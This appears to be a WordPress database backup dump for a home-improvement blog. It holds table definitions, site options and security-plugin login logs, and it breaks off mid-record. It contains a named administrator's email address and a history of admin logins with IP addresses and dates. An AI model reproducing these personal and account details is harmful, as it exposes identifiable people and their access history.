File: //restore/20230201.housing_todaycouk.sql
-- MariaDB dump 10.19 Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: housing_todaycouk
-- ------------------------------------------------------
-- Server version 10.5.18-MariaDB-1:10.5.18+maria~ubu2004
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `housing_todaycouk`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `housing_todaycouk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;
USE `housing_todaycouk`;
--
-- Table structure for table `wp_aiowps_events`
--
DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`event_type` varchar(150) NOT NULL DEFAULT '',
`username` varchar(150) DEFAULT NULL,
`user_id` bigint(20) DEFAULT NULL,
`event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`ip_or_host` varchar(100) DEFAULT NULL,
`referer_info` varchar(255) DEFAULT NULL,
`url` varchar(255) DEFAULT NULL,
`country_code` varchar(50) DEFAULT NULL,
`event_data` longtext DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_events`
--
LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_failed_logins`
--
DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`user_login` varchar(150) NOT NULL,
`failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_failed_logins`
--
LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
INSERT INTO `wp_aiowps_failed_logins` VALUES (1,0,'housing-today','2021-06-25 12:03:22','31.130.202.240'),(2,0,'housing-today','2021-09-17 14:04:26','185.175.113.72');
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_global_meta`
--
DROP TABLE IF EXISTS `wp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_global_meta` (
`meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
`date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`meta_key1` varchar(255) NOT NULL,
`meta_key2` varchar(255) NOT NULL,
`meta_key3` varchar(255) NOT NULL,
`meta_key4` varchar(255) NOT NULL,
`meta_key5` varchar(255) NOT NULL,
`meta_value1` varchar(255) NOT NULL,
`meta_value2` text NOT NULL,
`meta_value3` text NOT NULL,
`meta_value4` longtext NOT NULL,
`meta_value5` longtext NOT NULL,
PRIMARY KEY (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_global_meta`
--
LOCK TABLES `wp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_login_activity`
--
DROP TABLE IF EXISTS `wp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_activity` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`user_login` varchar(150) NOT NULL,
`login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`login_ip` varchar(100) NOT NULL DEFAULT '',
`login_country` varchar(150) NOT NULL DEFAULT '',
`browser_type` varchar(150) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=53 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_login_activity`
--
LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_activity` VALUES (1,1,'housing-today','2016-12-01 12:29:40','2017-02-07 15:53:41','217.206.184.94','',''),(2,1,'housing-today','2017-02-07 15:53:11','2017-02-07 15:53:41','217.206.184.94','',''),(3,1,'housing-today','2017-03-07 10:10:59','0000-00-00 00:00:00','217.206.184.94','',''),(4,1,'housing-today','2018-05-03 12:29:24','0000-00-00 00:00:00','185.175.113.75','',''),(5,1,'housing-today','2018-05-30 12:26:32','0000-00-00 00:00:00','185.175.113.75','',''),(6,1,'housing-today','2018-11-08 10:03:25','0000-00-00 00:00:00','185.175.113.75','',''),(7,1,'housing-today','2018-11-09 13:45:10','0000-00-00 00:00:00','185.175.113.75','',''),(8,1,'housing-today','2018-11-23 08:50:03','0000-00-00 00:00:00','185.175.113.75','',''),(9,1,'housing-today','2018-11-23 09:18:25','0000-00-00 00:00:00','185.175.113.75','',''),(10,1,'housing-today','2018-11-23 11:40:39','0000-00-00 00:00:00','185.175.113.75','',''),(11,1,'housing-today','2018-12-17 14:20:58','0000-00-00 00:00:00','185.175.113.75','',''),(12,1,'housing-today','2018-12-17 15:20:25','0000-00-00 00:00:00','185.175.113.75','',''),(13,1,'housing-today','2018-12-17 16:45:09','0000-00-00 00:00:00','185.175.113.75','',''),(14,1,'housing-today','2019-03-11 12:21:13','0000-00-00 00:00:00','185.175.113.75','',''),(15,1,'housing-today','2019-03-13 15:24:32','0000-00-00 00:00:00','185.175.113.75','',''),(16,1,'housing-today','2019-03-14 10:11:21','0000-00-00 00:00:00','185.175.113.75','',''),(17,1,'housing-today','2019-05-09 13:29:51','0000-00-00 00:00:00','185.175.113.75','',''),(18,1,'housing-today','2019-06-14 13:07:49','0000-00-00 00:00:00','185.175.113.75','',''),(19,1,'housing-today','2019-08-12 08:38:01','0000-00-00 00:00:00','185.175.113.75','',''),(20,1,'housing-today','2019-08-12 09:33:57','0000-00-00 00:00:00','185.175.113.75','',''),(21,1,'housing-today','2019-08-12 12:23:19','0000-00-00 00:00:00','185.175.113.75','',''),(22,1,'housing-today','2019-08-14 09:25:53','0000-00-00 00:00:00','185.175.113.75','',''),(23,1,'housing-today','2019-08-14 11:00:27','0000-00-00 00:00:00','185.175.113.75','',''),(24,1,'housing-today','2019-08-15 12:02:08','0000-00-00 00:00:00','185.175.113.75','',''),(25,1,'housing-today','2019-09-12 09:07:23','0000-00-00 00:00:00','185.175.113.72','',''),(26,1,'housing-today','2019-09-12 14:34:52','0000-00-00 00:00:00','185.175.113.72','',''),(27,1,'housing-today','2019-09-12 16:06:33','0000-00-00 00:00:00','185.175.113.72','',''),(28,1,'housing-today','2019-09-13 09:48:48','0000-00-00 00:00:00','185.175.113.72','',''),(29,1,'housing-today','2019-09-13 10:07:10','0000-00-00 00:00:00','185.175.113.72','',''),(30,1,'housing-today','2019-09-23 13:02:04','0000-00-00 00:00:00','185.175.113.72','',''),(31,1,'housing-today','2019-09-24 08:04:16','0000-00-00 00:00:00','185.175.113.72','',''),(32,1,'housing-today','2019-10-01 10:17:48','0000-00-00 00:00:00','185.175.113.72','',''),(33,1,'housing-today','2019-10-02 08:58:28','0000-00-00 00:00:00','185.175.113.72','',''),(34,1,'housing-today','2019-12-18 09:33:40','0000-00-00 00:00:00','185.175.113.72','',''),(35,1,'housing-today','2019-12-18 17:38:00','0000-00-00 00:00:00','185.175.113.72','',''),(36,1,'housing-today','2019-12-18 17:44:42','0000-00-00 00:00:00','185.175.113.72','',''),(37,1,'housing-today','2019-12-23 12:07:39','0000-00-00 00:00:00','185.65.27.70','',''),(38,1,'housing-today','2020-08-20 13:57:39','0000-00-00 00:00:00','185.175.113.72','',''),(39,1,'housing-today','2020-09-07 14:48:27','0000-00-00 00:00:00','185.175.113.72','',''),(40,1,'housing-today','2020-10-02 13:31:13','0000-00-00 00:00:00','185.175.113.72','',''),(41,1,'housing-today','2020-10-08 13:15:26','0000-00-00 00:00:00','185.175.113.72','',''),(42,1,'housing-today','2021-02-01 12:14:30','0000-00-00 00:00:00','90.252.81.243','',''),(43,1,'housing-today','2021-03-08 16:17:31','0000-00-00 00:00:00','90.254.62.75','',''),(44,1,'admin','2021-06-28 10:00:39','1000-10-10 10:00:00','185.175.113.72','',''),(45,1,'admin','2021-08-06 11:05:26','1000-10-10 10:00:00','185.175.113.72','',''),(46,1,'admin','2021-08-06 11:05:28','1000-10-10 10:00:00','185.175.113.72','',''),(47,1,'admin','2021-08-20 12:51:51','1000-10-10 10:00:00','185.175.113.72','',''),(48,1,'admin','2021-08-23 09:22:59','1000-10-10 10:00:00','185.175.113.72','',''),(49,1,'admin','2021-09-16 10:46:29','1000-10-10 10:00:00','185.175.113.72','',''),(50,1,'admin','2021-09-17 12:44:22','1000-10-10 10:00:00','185.175.113.72','',''),(51,1,'admin','2021-09-17 14:04:41','1000-10-10 10:00:00','185.175.113.72','',''),(52,1,'pp_adsasda111 -','2021-09-17 14:06:15','1000-10-10 10:00:00','185.175.113.72','','');
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_login_lockdown`
--
DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`user_login` varchar(150) NOT NULL,
`lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`failed_login_ip` varchar(100) NOT NULL DEFAULT '',
`lock_reason` varchar(128) NOT NULL DEFAULT '',
`unlock_key` varchar(128) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_login_lockdown`
--
LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_permanent_block`
--
DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`blocked_ip` varchar(100) NOT NULL DEFAULT '',
`block_reason` varchar(128) NOT NULL DEFAULT '',
`country_origin` varchar(50) NOT NULL DEFAULT '',
`blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`unblock` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_permanent_block`
--
LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_commentmeta`
--
DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_commentmeta`
--
LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_comments`
--
DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
`comment_author` tinytext NOT NULL,
`comment_author_email` varchar(100) NOT NULL DEFAULT '',
`comment_author_url` varchar(200) NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT 0,
`comment_approved` varchar(20) NOT NULL DEFAULT '1',
`comment_agent` varchar(255) NOT NULL DEFAULT '',
`comment_type` varchar(20) NOT NULL DEFAULT 'comment',
`comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_comments`
--
LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_fw_termmeta`
--
DROP TABLE IF EXISTS `wp_fw_termmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_fw_termmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`fw_term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `fw_term_id` (`fw_term_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_fw_termmeta`
--
LOCK TABLES `wp_fw_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_fw_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_fw_termmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_links`
--
DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
`link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) NOT NULL DEFAULT '',
`link_name` varchar(255) NOT NULL DEFAULT '',
`link_image` varchar(255) NOT NULL DEFAULT '',
`link_target` varchar(25) NOT NULL DEFAULT '',
`link_description` varchar(255) NOT NULL DEFAULT '',
`link_visible` varchar(20) NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
`link_rating` int(11) NOT NULL DEFAULT 0,
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) NOT NULL DEFAULT '',
`link_notes` mediumtext NOT NULL,
`link_rss` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_links`
--
LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_options`
--
DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
`option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(191) NOT NULL DEFAULT '',
`option_value` longtext NOT NULL,
`autoload` varchar(20) NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`),
KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=286003 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_options`
--
LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','http://housing-today.co.uk','yes'),(2,'home','http://housing-today.co.uk','yes'),(3,'blogname','Home Improvements Today','yes'),(4,'blogdescription','Transform your living space into a home','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','zoe.allen@vanillacircus.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','closed','yes'),(20,'default_ping_status','closed','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/blog/%postname%/','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','53496','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','1','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:4:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:3;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:482:\" <a class=\"twitter-timeline\" href=\"https://twitter.com/search?q=interior%20design\" data-widget-id=\"803629678787371008\">Tweets about interior design</a>\r\n <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\"://platform.twitter.com/widgets.js\";fjs.parentNode.insertBefore(js,fjs);}}(document,\"script\",\"twitter-wjs\");</script>\r\n \";s:6:\"filter\";b:0;}i:5;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:482:\" <a class=\"twitter-timeline\" href=\"https://twitter.com/search?q=interior%20design\" data-widget-id=\"803629678787371008\">Tweets about interior design</a>\r\n <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\"://platform.twitter.com/widgets.js\";fjs.parentNode.insertBefore(js,fjs);}}(document,\"script\",\"twitter-wjs\");</script>\r\n \";s:6:\"filter\";b:0;}}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:3:{s:29:\"spam-captcha/spam-captcha.php\";a:2:{i:0;s:12:\"spam_captcha\";i:1;s:20:\"uninstall_removedata\";}s:27:\"redirection/redirection.php\";a:2:{i:0;s:17:\"Redirection_Admin\";i:1;s:16:\"plugin_uninstall\";}s:27:\"wp-optimize/wp-optimize.php\";s:21:\"wpo_uninstall_actions\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','0','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','37965','yes'),(92,'wp_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:66:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO 